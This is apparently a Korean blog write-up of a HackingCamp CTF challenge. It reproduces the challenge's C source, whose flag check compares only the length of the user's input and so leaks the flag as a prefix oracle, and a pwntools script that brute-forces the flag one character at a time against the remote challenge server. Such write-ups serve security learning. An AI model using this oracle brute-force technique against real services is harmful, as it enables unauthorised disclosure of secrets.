int main(void)
{
FILE *fp;
int select = 0;
char flag[30] = "";
char userinput[30] = "";
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
setvbuf(stderr,0,2,0);
memset(flag,0,30);
memset(userinput,0,30);
fp = fopen("/home/magic/flag.txt","r");
fread(flag,30,1,fp);
fclose(fp);
puts("Welcome to HACKAINGCAMP!");
puts("I Will give you a chance for guess the flag");
puts("1. View SourceCode");
puts("2. GUESS FLAG ");
printf(">> ");
scanf("%d",&select);
switch(select)
{
case 1:
system("cat magic.c");
break;
case 2:
printf("give your message >> ");
scanf("%30s",userinput);
if(!strncmp(flag,userinput,strlen(userinput)))
{
puts("Good!");
}
else
{
puts("NONO...");
}
break;
}
}2번으로 플래그를 게싱할수있는데, 지금까지 입력한 값과 서버내의 플래그가 같으면 Good! 을 출력한다.
그래서 그냥 Bling SQLi 처럼 반응 보고 한글자씩 때려맞추면 된다.
참 쉽쥬?
Exploit
from pwn import *
import string
index = 0
payload = "HCAMP{"
while True:
try:
r = remote("pwnable.shop", 20204)
r.sendlineafter(">> ","2")
#plus = string.printable
r.sendlineafter(">> ",payload + string.printable[index])
response = r.recvline()
if "Good!" in response:
print(payload + string.printable[index])
payload += string.printable[index]
index = -1
if "}" in payload:
break
index += 1
except:
r.close()이건 솔직히 포너블이 ㅠㅠ...
campnote.pptx'System Hacking ( pwnable ) > CTF Write-up' 카테고리의 다른 글
| [BOB CTF] BOB CTF ( write-up ) (0) | 2019.08.27 |
|---|---|
| [YISF] 순천향대학교 CTF ( write-up ) (0) | 2019.08.25 |
| [hackingcamp] campnote ( write-up ) (0) | 2019.08.25 |
| [hackingcamp] bofforever ( write-up ) (0) | 2019.08.25 |
| [SSTF] bofsb ( write-up ) (0) | 2019.08.20 |
